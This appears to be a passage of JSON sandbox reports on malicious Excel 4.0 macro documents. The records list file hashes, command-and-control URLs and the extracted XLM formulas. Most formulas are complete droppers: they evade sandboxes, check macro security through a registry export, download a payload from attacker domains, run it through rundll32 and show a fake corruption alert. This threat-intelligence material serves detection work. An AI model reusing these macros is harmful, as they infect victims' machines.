255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"th0IDqOqQd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9c748cd4e66c24032d9d924bd79254327613c3a591974602848ed17a0baa70b3"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9c748cd4e66c24032d9d924bd79254327613c3a591974602848ed17a0baa70b3","filesize":185344,"md5":"6f0eab2894df54770568bc0e43a71c4a","sha1":"d5abcf8fb33938ab9ee26df1d49f2ae44e6bd237","sha256":"9c748cd4e66c24032d9d924bd79254327613c3a591974602848ed17a0baa70b3","sha512":"4889aca458b82695fe41cbfd76777ea1feb0bc12b22f30142a9c9fe219dd249fc38fed35718a92a12c69eb0b96c542aa3b814a1ce2428e1589c1c36ad84496c9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9c748cd4e66c24032d9d924bd79254327613c3a591974602848ed17a0baa70b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ca2a02d806751cc93d44ad735643564cdc0603bc568891110b346d117bfb846"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9ca2a02d806751cc93d44ad735643564cdc0603bc568891110b346d117bfb846","filesize":185344,"md5":"f3bcd514debd53c11c16b2e822328480","sha1":"dc1048f2f09c53ff86d0f67d08957934bce3ef66","sha256":"9ca2a02d806751cc93d44ad735643564cdc0603bc568891110b346d117bfb846","sha512":"910fc3e4c578fb0ea6378d6015f4d59760c9514803f7fbea61a5714f67afc6960d0e4c43fc4c53aa642c20c45ad861704c62bac7df9fa29e44482b504c89e5d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ca2a02d806751cc93d44ad735643564cdc0603bc568891110b346d117bfb846.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cb5bea95a5d5fcead879cbcc9e6831e242884a90a09d50e43840ee58d549fbc"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9cb5bea95a5d5fcead879cbcc9e6831e242884a90a09d50e43840ee58d549fbc","filesize":113664,"md5":"611eaf7bdb0f36338aacc94e261b07f9","sha1":"45fb6a693fc7b42412396e6b13ad0171636db64d","sha256":"9cb5bea95a5d5fcead879cbcc9e6831e242884a90a09d50e43840ee58d549fbc","sha512":"51869b5cc136fe9c3eea88dca034bff6e65d0ab47bd131d2f034429eab3ca7356cad319ef1b3642a4b81e97ea39f56678e572d32b7936cbe66d5114449742013","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cb5bea95a5d5fcead879cbcc9e6831e242884a90a09d50e43840ee58d549fbc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PiKLXIAPRl\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cbd85c19546d1068b301c93210d60ab9f47b967d7811f6fc8b6817d6179192d"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9cbd85c19546d1068b301c93210d60ab9f47b967d7811f6fc8b6817d6179192d","filesize":185344,"md5":"87f6c756a819b42769c5afe18f0b3b51","sha1":"538fbf5bd8caa8f79c23cac05880233929bc846a","sha256":"9cbd85c19546d1068b301c93210d60ab9f47b967d7811f6fc8b6817d6179192d","sha512":"6e9d620f00e7c4c4a39afc4f32ee2ac4f52d7ae94f354d114d0057d5c6db97a400072fb67c1e63a3db60bf9e3ff1ae930e7d21a2bacec1f097784e623fe8fea4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cbd85c19546d1068b301c93210d60ab9f47b967d7811f6fc8b6817d6179192d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cc5b87777b99f3480b8e2499a86222bf7adc3c90ad8e7d320ba29bfd58ee555"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9cc5b87777b99f3480b8e2499a86222bf7adc3c90ad8e7d320ba29bfd58ee555","filesize":209920,"md5":"5138ea6684a9c9a49619338714ed4a23","sha1":"ff4ef39c4d544132ace9061527ebe9df6e887d1f","sha256":"9cc5b87777b99f3480b8e2499a86222bf7adc3c90ad8e7d320ba29bfd58ee555","sha512":"c98f76ff0b48de82ce1ca19fb90368f37ad147cf75eeef3c071568f0189324156f1522dec4ffa07893153e8d5d1bd56fdb57dc192d3a132b7f7800f880245cb9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cc5b87777b99f3480b8e2499a86222bf7adc3c90ad8e7d320ba29bfd58ee555.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B0JIXuraul\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cca4d8e3ffcb9a80b96532319cc2f2e2ab733763b2a83c07dec593ea5b75dad"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9cca4d8e3ffcb9a80b96532319cc2f2e2ab733763b2a83c07dec593ea5b75dad","filesize":168960,"md5":"a3671241a4d950e5d74c01ebe583faef","sha1":"3e816bd5b20df1884c2deb557fd97800cf7e1834","sha256":"9cca4d8e3ffcb9a80b96532319cc2f2e2ab733763b2a83c07dec593ea5b75dad","sha512":"0ded915d93a40b16006a3b1633bf852d0e435979bb43e3eb438391284e70f312d853efe30229f23123394b9f3b89bf4137cc6a06d5c1bfc3b03a7873667627eb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cca4d8e3ffcb9a80b96532319cc2f2e2ab733763b2a83c07dec593ea5b75dad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RobzIcP52c\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cd58ebfe9fc18fe2c20b1190d365dce58209a734a50316d890156bac2830d0c"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9cd58ebfe9fc18fe2c20b1190d365dce58209a734a50316d890156bac2830d0c","filesize":170496,"md5":"462b8016ff15dcffaf206d137823e224","sha1":"f53870696d007d153817ef75cd05e36d219ac161","sha256":"9cd58ebfe9fc18fe2c20b1190d365dce58209a734a50316d890156bac2830d0c","sha512":"ff75266858e4bb5e8751218f7b8400ecd308f2870a0512d8ed0e9722cb815e8d9e0352d42148f1e5fa68f6760402e7f950a4af04b4e0521ad751a79d484e0bf4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cd58ebfe9fc18fe2c20b1190d365dce58209a734a50316d890156bac2830d0c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OCGCB9ybke\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ce93787d80c1b709a8ba720500d7d407fda6bbf78c622a0dd5c22539b6cef6e"},"analysis":{"reported":"2020-04-09T16:17:57Z","score":10},"files":[{"filename":"9ce93787d80c1b709a8ba720500d7d407fda6bbf78c622a0dd5c22539b6cef6e","filesize":225280,"md5":"de6b1d025cdf6af9a69cc5f0f913b236","sha1":"4a639bc81b39977894fa4a3610ec07c87635ec55","sha256":"9ce93787d80c1b709a8ba720500d7d407fda6bbf78c622a0dd5c22539b6cef6e","sha512":"5ed4f2cf2c039b904a12cb033aecf909f39e1604f49cf0c623d92ae61562c586be88808fc9964d053237d51e1364fbea8c3d5c8edcc0edb2fe2e55adc1585b85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ce93787d80c1b709a8ba720500d7d407fda6bbf78c622a0dd5c22539b6cef6e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V1OMtVfANL\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9cf659e8acbb2a77630cf7be9908b951c2674b2bcf4570279bbc4b43fcfe1de4"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9cf659e8acbb2a77630cf7be9908b951c2674b2bcf4570279bbc4b43fcfe1de4","filesize":163328,"md5":"651077bee6c879c1693fec653c45570e","sha1":"6fe37ed650bab4085eb9ee6a674328e03939f6c6","sha256":"9cf659e8acbb2a77630cf7be9908b951c2674b2bcf4570279bbc4b43fcfe1de4","sha512":"7c8fcf26bb266e9f4909708a9767f22ee177d421cc914b82c844a1c0c18256b579c1b4a13364e8be7da96d8e9976ebe6b2221ac33b6f2a74b2421366e2f59c7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9cf659e8acbb2a77630cf7be9908b951c2674b2bcf4570279bbc4b43fcfe1de4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2IOtqKiUNC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d03805e47673d4bf7571e1784016adafe6ab6042986f6af2dc203c6b52ce0a7"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d03805e47673d4bf7571e1784016adafe6ab6042986f6af2dc203c6b52ce0a7","filesize":160768,"md5":"a51122ef8ee819fd4c2107bce882877e","sha1":"263edc2ebe2fcbc349806bde58fa5ec3a1ee24a4","sha256":"9d03805e47673d4bf7571e1784016adafe6ab6042986f6af2dc203c6b52ce0a7","sha512":"e8b8459e8895f150637e6c6bc3be5172ccd78ba9b4c7fc268ebcee53a09299ab3eb03082307007b81e37ec5ddee5dd193dd22b7ed6906fccff699d874fba06e0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d03805e47673d4bf7571e1784016adafe6ab6042986f6af2dc203c6b52ce0a7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GQsOEWFVHq\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d041ec1e00a7d6f8a17e17d6ca728aaead2c74beb52aa7a133b5a81bb1f97a6"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d041ec1e00a7d6f8a17e17d6ca728aaead2c74beb52aa7a133b5a81bb1f97a6","filesize":145920,"md5":"bc253d4ed4adc55c607f1890bb3d3d44","sha1":"087c50201457f56ee06254972b27b5d79c4100b8","sha256":"9d041ec1e00a7d6f8a17e17d6ca728aaead2c74beb52aa7a133b5a81bb1f97a6","sha512":"0d823b13e8500694501b52870331cdbb9a24bbeacf88e5b334703f74dbe08d9eddcbf9816c2ac85937df9529ccb9b0d0cd06943dd6ccb039f54605fcb448f572","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d041ec1e00a7d6f8a17e17d6ca728aaead2c74beb52aa7a133b5a81bb1f97a6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"hkcPGh3zha\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d15608989eba20b02e768389713ff7a3bab548785a2f77cc2a03e7551b53c31"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d15608989eba20b02e768389713ff7a3bab548785a2f77cc2a03e7551b53c31","filesize":112640,"md5":"8abc211bd10c2f79554282f6bddf4544","sha1":"fb6b4a3b468deae42004ed7e0685614dc6c80a2f","sha256":"9d15608989eba20b02e768389713ff7a3bab548785a2f77cc2a03e7551b53c31","sha512":"248cba9485ab227c94982b754a47a35b00958707246ca087f4e4117b4d6979dee2637c2c08e9ddb340d0860f5a7e4089d16129d2ca08f88b27240ee9f51a232d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d15608989eba20b02e768389713ff7a3bab548785a2f77cc2a03e7551b53c31.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d17994d5986c63e720e726054b754df2a6432081bbc6b48d294db5de02a9f69"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d17994d5986c63e720e726054b754df2a6432081bbc6b48d294db5de02a9f69","filesize":152576,"md5":"083efbdc65c51d253ae2f661117a09dc","sha1":"f4a4c6737eea651a6b94f96bad42987f8639d665","sha256":"9d17994d5986c63e720e726054b754df2a6432081bbc6b48d294db5de02a9f69","sha512":"8527be81ec84ace1bbcb261770f9fb40b3f872d9f8fe6dc1c94dcc078364e85bccfeef69e40935d7549684b1b15107771dcf6f3726d0ced2b2c06200893e73f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d17994d5986c63e720e726054b754df2a6432081bbc6b48d294db5de02a9f69.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"KDpRVVOIEr\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d1b6448808047c8a1d72a486892b75274b235376c4f8cb550425088bb0ae122"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d1b6448808047c8a1d72a486892b75274b235376c4f8cb550425088bb0ae122","filesize":206336,"md5":"2fe12e090650c3aafef8e046ffe6635a","sha1":"ad89abeba36f590ffe7ce7c8f4a23bb14da3864c","sha256":"9d1b6448808047c8a1d72a486892b75274b235376c4f8cb550425088bb0ae122","sha512":"a153b87b3aea194c4e5e2cfb7c08f334e9f13decb3283439e660be7e4bc9e4a37e5afb811da3ba0961313bfb6083d3361e0f7968dea97d2bc29daa25b35eb7b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d1b6448808047c8a1d72a486892b75274b235376c4f8cb550425088bb0ae122.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RxRdA0OAr6\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9d2346c936cc97f719b9dbdbc96dd93c9979876a6417373e2960b396ba380b22"},"analysis":{"reported":"2020-04-09T16:17:58Z","score":10},"files":[{"filename":"9d2346c936cc97f719b9dbdbc96dd93c9979876a6417373e2960b396ba380b22","filesize":142848,"md5":"b55d74036a6eb63220671b0c06cf7d81","sha1":"1cc08a0e9ea9083901ab944ede3d55a347bf72a8","sha256":"9d2346c936cc97f719b9dbdbc96dd93c9979876a6417373e2960b396ba380b22","sha512":"a7ffcdaf23090e316b62989e4f0779b0a187a89502e990467ca40f2652f17967c3167103dbe6b8523256916034f5f51c7c9bd18cbda127b6164f27097371c582","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9d2346c936cc97f719b9dbdbc96dd93c9979876a6417373e2960b396ba380b22.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"9SZpEhEP7l\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
